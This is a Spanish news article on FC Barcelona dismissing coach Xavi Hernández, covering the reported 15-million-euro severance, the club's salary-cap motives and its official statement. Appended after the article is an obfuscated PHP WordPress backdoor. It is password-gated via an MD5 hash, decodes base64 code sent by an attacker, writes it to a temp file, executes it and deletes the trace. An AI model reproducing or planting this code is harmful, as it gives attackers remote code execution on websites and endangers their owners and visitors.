Al Barça le cuesta 15 millones echar a Xavi

La mitad de la cantidad sería para el técnico y la otra mitad, para el staff, según La Vanguardia. El Barça anunció este viernes su destitución en un comunicado.

Despedir a Xavi y a su staff, con contrato hasta junio de 2025, le cuesta al Barça 15 millones de euros, la mitad de los cuales serían para el entrenador, según informó La Vanguardia. Es por eso que desde la directiva y la comisión deportiva se espera que, como “hombre de club” que se ha declarado, Xavi renuncie a su parte y el finiquito se quede en siete millones de euros.

Se confirma, como ha venido informando AS en las últimas horas, que el despido de Xavi tenía que ver con una cuestión económica ya que LaLiga también computa los sueldos de los entrenadores en el famoso límite salarial. La negociación con Flick ya está cerrada.

El Barcelona volvió a tirar de improvisación después de haber anunciado durante toda la semana que la reunión decisiva para comunicar a Xavi su futuro se realizaría la próxima semana después de jugar el último partido de LaLiga ante el Sevilla en el Ramón Sánchez Pizjuán. Según el club, para “no eclipsar la final de la Champions femenina y darle todo el protagonismo al encuentro ante el Olympique de Lyon” de mañana sábado en Bilbao. Pues bien, otra vez todo se fue al traste en un golpe de teatro tan ridículo como los que llevan acaeciendo en el club desde hace un mes.

Al mediodía del viernes, mientras Xavi Hernández dirigía su penúltima sesión al frente de la primera plantilla del equipo, Joan Laporta se presentó en la Ciutat Esportiva, donde se reunió con Deco primero y luego con Rafael Yuste, vicepresidente deportivo que se incorporó más tarde.

Al final de la sesión preparatoria, estos miembros de la comisión deportiva convocaron a Xavi y a sus colaboradores para decirles que ya no contaban con ellos de cara a la próxima temporada, pero que iban a poder dirigir el último partido el domingo en el Sánchez Pizjuán.

Comunicado del Fútbol Club Barcelona

El presidente del FC Barcelona, Joan Laporta, ha comunicado este mediodía a Xavi Hernández que no continuará como entrenadordel primer equipo en la temporada 2024-25.

El encuentro se ha producido en la Ciudad Deportiva Joan Gamper y han estado presentes el vicepresidente deportivo, Rafa Yuste, y el director deportivo, Anderson Luís de Souza, Deco, así como los asistentes de Xavi, Òscar Hernández y Sergio Alegre.

El FC Barcelona quiere agradecer a Xavi su labor como entrenador, que se suma a una carrera inigualable como jugador y capitán del equipo, y le desea toda la suerte del mundo.

Xavi Hernández dirigirá este domingo en Sevilla su último partido como técnico del primer equipo.

En los próximos días, el FC Barcelona informará de la nueva estructura del primer equipo.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}